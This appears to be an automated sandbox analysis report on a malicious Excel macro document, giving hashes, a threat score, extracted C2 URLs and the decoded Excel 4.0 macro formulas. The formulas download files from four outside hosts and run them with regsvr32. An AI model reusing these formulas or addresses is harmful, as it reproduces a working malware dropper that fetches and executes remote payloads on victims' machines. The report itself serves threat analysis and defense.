General

  • Target

    2022-11-8-b9dd57a79aaa1a8ff03b3c482abbf204.bin

  • Size

    228KB

  • MD5

    b9dd57a79aaa1a8ff03b3c482abbf204

  • SHA1

    0816d70a7be2e6c77a45c406f6051701a39f68d5

  • SHA256

    74a77b0770be378c8faadbeb90fe614ae8a90b870af0695996b9cc5b3cf10c8e

  • SHA512

    a2491c04004f65a41ea4fb55f98d703b628b8b6dd106a81c8e73becbf7df2d7ddf482f79ad815bd0ccad7af84e16446a8d53f76521dcaf4880898968bb3ee5b3

  • SSDEEP

    6144:hR2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyU:hR2LDHf9PH5XUqRLTyU

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://bencevendeghaz.hu/2zjoi/aUJLqwAxxlq/

http://ftp.agoraexpress.info/cgi-bin/rooSQD2tWB/

http://45.32.114.141/xilte/SYtPsYVOaJpNvcqVTOi/

http://www.nipunpharmaskill.com/fonts/jHAVDcbRKKHP24FAf/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bencevendeghaz.hu/2zjoi/aUJLqwAxxlq/","..\oxnv1.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ftp.agoraexpress.info/cgi-bin/rooSQD2tWB/","..\oxnv2.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://45.32.114.141/xilte/SYtPsYVOaJpNvcqVTOi/","..\oxnv3.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx") =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.nipunpharmaskill.com/fonts/jHAVDcbRKKHP24FAf/","..\oxnv4.ooccxx",0,0) =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • 2022-11-8-b9dd57a79aaa1a8ff03b3c482abbf204.bin
    .xlsm office2007